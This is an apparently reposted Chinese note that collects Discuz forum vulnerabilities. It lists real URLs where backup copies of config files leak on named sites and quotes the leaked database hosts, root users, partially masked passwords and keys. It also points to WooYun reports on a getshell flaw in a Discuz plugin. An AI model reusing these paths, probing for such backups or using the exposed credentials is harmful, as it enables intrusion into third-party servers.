关于discuz的漏洞整理

---恢复内容开始---

 

http://tita.qq.com/bbs/config/config_global.php.bak

http://tita.qq.com/bbs/config/config_global.php~

http://tita.qq.com/bbs/config/config_ucenter.php~

http://tita.qq.com/bbs/config/config_ucenter.php.bak 

http://bbsuc.duba.net/data/config.inc.php.bak

http://bbsuc.duba.net/config.inc.php.bak

 

匹配特征:

<?php

$_config = array();

// ---------------------------- CONFIG DB ----------------------------- //

$_config[db][1][dbhost] = localhost;

$_config[db][1][dbuser] = root;

$_config[db][1][dbpw] = 62***29;

$_config[db][1][dbcharset] = gbk;

$_config[db][1][pconnect] = 0;

$_config[db][1][dbname] = bbs_iappsafe;

$_config[db][1][tablepre] = safe_;

$_config[db][common][slave_except_table] = ‘‘;


code 区域
<?php

define(UC_CONNECT, mysql);

define(UC_DBHOST, 114.112.**.***);

define(UC_DBUSER, root);

define(UC_DBPW, kingsoft***11);

define(UC_DBNAME, dybiduba);

define(UC_DBCHARSET, gbk);

define(UC_DBTABLEPRE, `dybiduba`.cdb_uc_);

define(UC_DBCONNECT, 0);

define(UC_CHARSET, gbk);

define(UC_KEY, q8c8X96253G0d8*****************aB4H8G2k1Gbb0GbA589mc);

define(UC_API, http://bbs.duba.net/uc_server);

define(UC_APPID, 1);

define(UC_IP, 114.112.36.184);

define(UC_PPP, 20);

 2.产品名:Discuz!应用开发助手

安装量较高,此处分析此产品可getshell的一个部分。

http://www.wooyun.org/bugs/wooyun-2010-081178

利用方法:http://www.wooyun.org/bugs/wooyun-2014-079343

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。